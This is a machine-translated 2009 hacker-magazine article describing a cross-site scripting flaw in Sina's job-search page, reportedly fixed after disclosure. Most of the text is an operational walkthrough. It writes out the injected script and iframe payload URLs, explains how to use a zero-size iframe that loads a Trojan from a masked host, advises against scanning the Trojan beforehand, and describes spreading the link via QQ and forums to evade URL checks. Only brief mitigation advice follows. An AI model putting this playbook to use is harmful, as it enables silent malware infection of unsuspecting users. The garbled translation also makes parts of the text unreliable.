Secrets of Sina recruitment (cross-site scripting attacks)

Author: Miao Diyu

Lead in this issue: Sina recruitment

Problem: loose keyword filtering, cross-site scripting attacks

Major Hazards: Trojan attacks

Survey time: 2009.6.24 ~ 2009.6.26

Vulnerability status: fixed by notification

As one of the top portals in China, Sina has always been a target for many hackers. Recently, hackers in the computer newspaper discovered a secret about Sina, a secret that cannot be disclosed to others. Sina recruitment has a cross-site Trojan Infection vulnerability.

 

The current economic downturn and hard work are difficult to find. If graduation is equal to unemployment, you can always see it online. As a good job, countless people will break their heads, but it is undoubtedly a good job to go to Sina, and there are countless people submitting applications. "Sina recruitment" is a sub-station dedicated to talent recruitment by Sina (figure 1 ).

However, because the site does not filter the search keywords submitted by users, the cross-site scripting vulnerability exists. Hackers can construct special script code to directly write Trojan code into the webpage. Users only need to click the link to trigger webpage Trojans. If the mini-editor does not notify Sina to fix the vulnerability in time, how many people will be poisoned if the vulnerability is used for Trojan Infection?

 

LAX keyword Filtering

On the "Sina recruitment" homepage, the job search function is provided. You can directly enter the keyword of the job you want to search for. For example, if you enter "edit ", click "Start search" button to quickly get the search results, the results page URL is as follows: http://career.sina.com.cn/job_list.php? Area = & type = & ptype = & datearea = & keyword = % B1 % E0 % BC % AD. "% B1 % E0 % BC % AD" is URL-encoded "edit ".

It can be seen that the "keyword" parameter is followed by the search keyword. Many websites do not filter dangerous characters when using parameters for queries. Will Sina also make such a low-level mistake? Replace the keyword "% B1 % E0 % BC % AD" with "<script> alert (test) </script> ". After you press enter, a dialog box is displayed, with the content "test" (Figure 2), which proves that Sina recruitment does have a Cross-Site vulnerability, and the subsequent steps are as follows, this vulnerability will make us feel terrible.

Sina recruitment Trojan Road Show

Change the keyword after the keyword parameter to <iframe src = "http://www.baidu.com" width = 900 height = 1200> </iframe> ", press enter and we can see the baidu search box (Figure 3) at the bottom of the "Sina recruitment" homepage ). This indicates that we have successfully inserted Baidu into the homepage of "Sina recruitment". If we change the Baidu website address to the webpage Trojan address ......

 

 

Step 1: create a webpage Trojan

To mount a Trojan on "Sina recruitment", you must first configure a webpage Trojan. Ordinary users pay attention to fixing Windows system vulnerabilities, but are easy to ignore the vulnerability fixing of third-party software. Therefore, the success rate of exploiting such vulnerabilities is high. Here we choose storm audio and video vulnerabilities.

Then we need to prepare a webpage space (using free space on the network) and upload the configured Trojan server to the webpage space. We recommend that you do not kill the trojan beforehand, which can improve the self-protection capability of the Trojan. Prepare the webpage and the webpage Trojan (figure 4 ).

 

 

Step 2: Construct a trojan URL

After creating a webpage Trojan, we upload it to the webpage space and then construct a trojan URL. Replace the keyword with the trojan code, the complete URL after replacement is as follows: http://career.sina.com.cn/job_list.php? Area = & type = & ptype = % CA % D0 % B3 % A1 % D3 % AA % CF % FA % C0 % E0 & datearea = & keyword = <iframe src = "http: // www. ***. com/bf.htm "width = 0 height = 0> </iframe>.

Change the values of the "width" and "height" parameters to 0, so that webpage Trojans will be opened quietly and will not open a page as they did when testing Baidu, in this way, we can greatly mention the concealment of Trojans. Now, we only need to allow others to access this URL to mount the Trojan.

 

Step 3: Spread the trojan URL

Because we are using "Sina recruitment" for Trojans, career.sina.com.cn appears at the beginning, and the trojan code appears at the end, therefore, various software with the URL security detection function will regard it as a URL of Sina, so it is successfully released.

Let's do a test. Trojan codeHttp://career.sina.com.cn/job_list.php? Area = & type = & ptype = % CA % D0 % B3 % A1 % D3 % AA % CF % FA % C0 % E0 & datearea = & keyword = <iframe % 20src =" http: // www. ***. com/bf.htm "% 20 width = 0% 20 height = 0> </iframe>, copy to the QQ chat window and send it to the other party. The result shows a green flag after the QQ detection URL, the URL is normal (figure 5 ).

In addition, hackers can also mount Trojan URLs to areas with large traffic volumes such as forums, chat rooms, and blogs Based on recruitment information. If hackers do this, the consequences will be unimaginable.

Security Encyclopedia: before sending a trojan URL, replace the space in the URL with % 20. Otherwise, the hyperlink may be incomplete during sending.

 

Vulnerability Solution

To block this vulnerability, You need to strictly filter keywords on the Sina recruitment website. You are not allowed to enter the website, or even run the website. For ordinary users, real-time monitoring of anti-virus software must be enabled when accessing the Internet. It is best to use a security auxiliary tool with the Web Trojan Interception Function.

Carefully identify the URLs sent by others. If sensitive content such as iframe or script or the URL is encrypted, the URL cannot be clicked, it is very likely that a huge Trojan plot is hidden behind the URL.